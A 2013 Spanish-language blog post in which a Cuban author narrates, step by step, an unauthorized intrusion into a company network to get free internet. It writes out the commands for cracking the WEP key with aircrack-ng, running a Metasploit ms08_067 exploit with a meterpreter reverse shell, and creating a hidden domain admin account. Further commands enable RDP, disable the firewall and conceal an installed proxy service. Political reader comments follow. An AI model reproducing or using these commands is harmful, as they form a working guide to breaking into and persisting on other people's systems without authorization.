Páginas

viernes, 1 de marzo de 2013

Como obtuve Internet gratis en Cuba.



Bueno como ya les dije soy de Cuba y en este pais nadie puede tener internet en su casa. Si hay internet, por supuesto, pero no es para los cubanos, es solo para los extranjeros y algunos centros de trabajos o empresas. O sea que aunque yo tenga dinero no puedo ir a ETECSA y decirle que me pongan internet en mi casa. Es injusto verdad? Pero bueno es mi pais y me conformo con lo que tengo en el, hay paises peores. En fin, vamos a lo que nos concierne la parte de como obtuve el internet de forma gratuita y como permanezco en el. 

Todo comenzo cuando me compre una Wi-Fi y la puse en el techo de mi casa con una antena casera. En seguida inicie mi Linux (Backtrack 5 R3) y me puse a escuchar para ver si veia algun AP (Access Point) cerca: 

root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng mon0



En seguida comenzaron a aparecer varios APs, entre a varios que tenian filtro de MAC pero eran locales, de personas que los ponen para chatear entre ellos, jugar, etc, pero nada de internet. Necesitaba uno de alguna empresa importante que tuviera algun server con internet permanente. Pues efectivamente, encontre uno, de hecho al que veo con mejor se~al. No le habia querido entrar pues envez de filtro de MAC lo que tenia era una clave con cifrado WEP y yo estaba vago, era mas facil clonar la MAC de un cliente que ponerme a crackear un cifrado WEB, pero bueno ya era hora de ver si en esa red estaba lo que yo tanto buscaba. Pues voy a romper su cifrado (me dije): Comenze a capturar paquetes desde los clientes conectados al AP (la MAC es la del AP, -c indica el canal, es lo mismo que --channel, y -w equivale a --write y es para que guarde los paquetes capturados en un archivo .cap, en mi caso se llamaria KEY-01.cap)

root@bt:~# airodump-ng mon0 --bssid 45:02:7F:BC:C4:87 -c 1 -w KEY

Pero el numero de paquetes de datos es insignificante, son muy pocos para romper un cifrado WEP, pues bien voy a generar bastante trafico para poder capturar mas paquetes de datos, para lo cual utilice el aireplay-ng con la opcion -3 para hacer peticiones ARP, -b para indicar la MAC del AP -h para indicar la MAC de uno de los clientes que estaba conectado en ese momento con el fin de suplantar su identidad:

root@bt:~# aireplay-ng -3 -b 45:02:7F:BC:C4:87 -h d8:8f:33:6b:fc:39 mon0



Enseguida comenzo a incremetarse el trafico y la captura de paquetes, pues cuando habian suficientes (creo que eran como 80 000, pero con menos se puede) procedi a crackear la clave con aircrack-ng:

root@bt:~# aircrack-ng KEY-01.cap

...y no tardo nada en decifrar la clave. Pues bien era hora de conectarme para ver si la clave era la correcta
 
root@bt:~# iwconfig wlan0 essid "Victima" channel 1 key E56933ND4Wroot@bt:~# iwconfig

y para mi sorpresa: Access Point: 45:02:7F:BC:C4:87 Ya estaba conectado, ahora necesitaba un IP dentro del rango:

root@bt:~# dhclient wlan0

Pero no, esto no sirvio ya que no tenia un servidor DHCP, o sea que los IP eran estaticos. Pues bien me voy a asignar un IP yo mismo, pero como sabia el rango de IP, necesitaba capturar algun IP de la red con algun sniffer, pues bien procedi a abrir el etherape y enseguida aparecieron los primeros IPs de tipo 192.168.100.1, etc. Genial voy a dejar un rato mas el etherape para ver todos los IPs de la red para (0) no asignarme niguno que ya exista para que no le salga un cartel de conflicto de IP en la red en Windows y (1) para estudiar el escenario y saber a donde dirigir el ataque. Pues bien me asigne un IP estatico (ifconfig wlan0 192.168.100.251) y procedi a escanear toda la red para rectificar todos los maquinas que estaban conectadas ya que a veces el etherape no es tan preciso pues si no detecta actividad a veces no muestra alguna maquina:

root@bt:~# nmap -sP 192.168.100.0-255

Salieron como 7, no habian muchas maquinas conectadas. Procedi pues a ver si encontraba un servidor con internet asi que me decidi por el 192.168.100.1 ya que era probable que fuera ese por ser el .1 asi que le hice un escaneo de puertos:


root@bt:~# nmap -v -A -T4 192.168.100.1

Pues para mi sorpresa tenia abierto muchos puertos comprometedores; 21, 25, 80, 139, 445, etc. Y para colmo era un Windows Server 2003. Asi que decidi lanzarle un payload mediante un exploit ya que era la forma mas sencilla y elegante para acceder a la maquina:

root@bt:~# msfconsolemsf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set LHOST 192.168.100.251msf exploit(ms08_067_netapi) > set RHOST 192.168.100.1msf exploit(ms08_067_netapi) > exploit

Y luego...:

meterpreter > getsystem...got system (via technique 1).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > screenshot

Vaya las cosas se hicieron mucho mas facil cuando vi en su escritorio un icono de coneccion a Internet que decia: "Acceso directo - ETECSA" y vi que tenia dos iconos de red conectada en la bandeja del sistema. Pero bueno necesitaba estar mas seguro asi que ejecute un shell y...:

meterpreter > shellProcess 3500 created.Channel 1 created.Microsoft Windows [Versi�n 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:\WINDOWS\system32> ipconfig /all...Adaptador PPP ETECSA: Sufijo conexi�n espec�fica DNS: Descripci�n . . . . . . . . . : WAN (PPP/SLIP) Interface Direcci�n f�sica. . . . . . . : 02-45-21-12-00-00 DHCP habilitado . . . . . . . : No Direcci�n IP. . . . . . . . . : xxx.xx.xxx.xxx M�scara de subred . . . . . . : 255.255.255.255 Puerta de enlace predet.. . . : 0.0.0.0 Servidores DNS. . . . . . . . : xxx.xx.xxx.x xxx.xx.xxx.xC:\WINDOWS\system32> exitmeterpreter >

Ya sabia que era un server y que estaba conectado a internet, asi que yo podia aprovechar eso y robarme, o sea tomar prestado, ese internet, en fin lo que por derecho creo que me pertenece. Asi que lo que hare sera sencillo le instalare un servidor proxy y yo saldre a traves de el. Pero como hago eso, yo no conozco nigun servidor que sea a modo de comandos nada mas y aunque existiera yo no lo tenia ya que no tenia internet, buscando en un DVD de programas me encontre con el ProxyPlus, un server proxy muy sencillo, solo para 3 usuarios, se administra completamente via web y se instala como un servicio en Windows, tampoco sale en menu inicio, pero para instalarlo es mediante interfaz grafica, que hacer, pues no tenia otra opcion. Voy a crearme un usuario con privilegios de administracion y voy a habilitar RDP (Escritorio Remoto). Si el hash del Administrador tambien lo obtuve y descifre su password pero no podia iniciar session con el mismo usuario que el asi que tenia que crearme mi propio usuario, menos mal que Windows Server 2003 permite dos sessiones simultanes de Escritorio Remoto. Asi que procedi:

meterpreter > shellProcess 4148 created.Channel 2 created.Microsoft Windows [Versi�n 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:\WINDOWS\system32>net usernet userCuentas de usuario de \\-------------------------------------------------------------------------------Administrador SUPPORT_893434f6 C:\WINDOWS\system32> net user Administrator toor /addnet user Administrator toor /addSe ha completado el comando correctamente.C:\WINDOWS\system32> net groupnet groupCuentas de grupo de \\-------------------------------------------------------------------------------*Administradores de esquema*Administradores de organizaci�n*Admins. del dominio*Controladores de dominio*DnsUpdateProxy*Equipos del dominio*Invitados del dominio*Propietarios del creador de directivas de grupo*servermail*usermail*Usuarios del dominioC:\WINDOWS\system32> net group "Administradores de esquema" Administrator /addSe ha completado el comando correctamente.C:\WINDOWS\system32> net group "Admins. del dominio" Administrator /addSe ha completado el comando correctamente.C:\WINDOWS\system32> reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /fC:\WINDOWS\system32> reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /fC:\WINDOWS\system32> Netsh firewall set opmode disableC:\WINDOWS\system32> exitmeterpreter >

...y en otro terminal:

root@bt:~# rdesktop -f 192.168.100.1

...y ahi estaba en su escritorio. Luego de logearme con mi nuevo usuario debia ocultar la carpeta que crea el mismo en C:\Documents and Settings\Administrator, y asi lo hice:

meterpreter > shellProcess 3500 created.Channel 1 created.Microsoft Windows [Versi�n 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:\Documents and Settings> attrib +H +S Administratorattrib +H +S AdministratorC:\Documents and Settings>

...luego procedi a instalar el proxyplus. Inicie mi servidor FTP (pure-ftpd) donde tenia el instalador y lo descarge desde la maquina de la victima a la carpeta C:\WINDOWS\TEMP por si acaso se me olvidava borrarlo que se borrara automaticamente al reiniciar el sistema. Elegi como carpteta de instalacion C:\WINDOWS\System32\ProxyPlus y de igual manera le asigne atributos de Hide y System:

C:\WINDOWS\system32\ProxyPlus> attrib +H +S ProxyPlusattrib +H +S ProxyPlusC:\WINDOWS\system32\ProxyPlus>

...pero me faltaba algo mas, debia asegurarme de que no apareciera en Agragar/Quitar Programas del Panel de Ctrl, sencillo, bastaba con modificar la clave HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Proxy+ y donde decia "DisplayName" borrar el valor. 

 Ahora tenia que iniciar el servicio: Desde meterpreter:

meterpreter > run service_manager -S -n ProxyPlus Desde MS-DOS:

C:\WINDOWS\system32> net start ProxyPlus

Perfecto ya no me faltaba nada. Solo entrar por via web al servidor por el puerto 4400 (Puerto de administracion del ProxyPlus) y configurarlo correctamente. y cuando escribi en mi navegador: www.google.com que emocion ver que estaba en internet, sin ninguna restriccion y sin tener que pagar nada, todo con una Wi-Fi. Por supuesto esta de mas decir que cada vez que me desconecto detengo el servicio para que no salga en los procesos: Desde meterpreter:

meterpreter > run service_manager -K -n ProxyPlus

Desde MS-DOS:

C:\WINDOWS\system32> net stop ProxyPlus

Es de esta manera que me encuentro actualmente en Internet. Si tienen alguna sugerencia de como asegurar mejor mi estancia se los agradeceria. Bueno espero que les sirva de algo ya que esto es la reconstruccion de un ataque de penetracion en el mundo real y las tecnicas aqui llevadas a cabo son tecnicas sencillas y poco complejas que muchos de ustedes seguramente ya conocen pero estan todos juntas bajo un mismo proposito y es una rutina que puede repetirse en muchos casos. 
Saludos


Como construir una antena casera con un adaptador USB WiFi para obtener internet en Cuba burlando la censura de la dictadura castrista, vea el siguiente enlace:

http://cubayatwittea.blogspot.com/2013/01/como-acceder-internet-en-cuba-super.html

8 comentarios:

  1. Caballero mira que ustedes tienen deseos de hablar basura.!!!

    ResponderEliminar
  2. Si tienen tantas ganas de hablar de Cuba por qué no entran a Cubadebate y conocen lo que sucede en nuestro país, estas cuestiones que ustedes hablan es pura basura, en Cuba suceden a diario muchas cosas maravillosas que ustedes no dicen ,solo ponen una lupa en lo mal hecho que tiene nuestro socialismo que bien o mal es nuestro y eso es lo que les duele, pero ni piensen que algún día volverán a poner sus asquerosas manos sobre Cuba, porque nosotros mismos, los de adentro se las cortamos.!!!!

    ResponderEliminar
    Respuestas
    1. Todo es cuestion de tiempo, ya los tiranosaurios no dan más y el muro de la sensura esta cada dia mas facil de penetrar con las nuevas tecnologias, jodanse partia de lame botas. los Cubanos estan despertando.

      Eliminar
    2. Cuba debate es una basura, la misma mierda de el NTV ( lo malo de el mundo y Cuba es el paraiso) si el muro de la sensura termina de caer terminaran desnudos con toda su mierda que ya no se la cren ni ustedes mismos.

      Eliminar
  3. A ti te gusta leer la basura. Visitas mucho nuestro Blog, parece que te gusta, verdad?
    Cuba sera libre de tirania!

    ResponderEliminar
    Respuestas
    1. Jajaja ese baboso esta haciendo su antenita ya por tù blog porque el internet que tiene en su trabajo o escuela UCI lo más seguro es solo para Cubadebate bajo la supervision de los lamebotas mayores.

      Eliminar
  4. LIBERTAD PARA EL OPOSITOR ROBERTO HERNANDEZ EN HUELGA DE HAMBRE DESDE HACE MAS 7 DE DIAS
    Fue detenido y golpeado en una manifestacion pacifica, sus familares temen por su vida debido a los problemas de salud ke presenta, asimismo le fracturaron un brazo donde tenia tatuada las palabras !Abajo Fidel!,le quieren fabricar cargos de atentado para justificar la golpiza. Hacemos responsable al gobierno de Cuba por esta detención sin fundamentos legal y sus consecuencias. Pedimos el apoyo de todas las personas de buena voluntad para exigir su liberación. telefono de contacto de familiares USA 941 2661234, Cuba 50 3635.

    ResponderEliminar
  5. como escriben mierda en esta pagina

    ResponderEliminar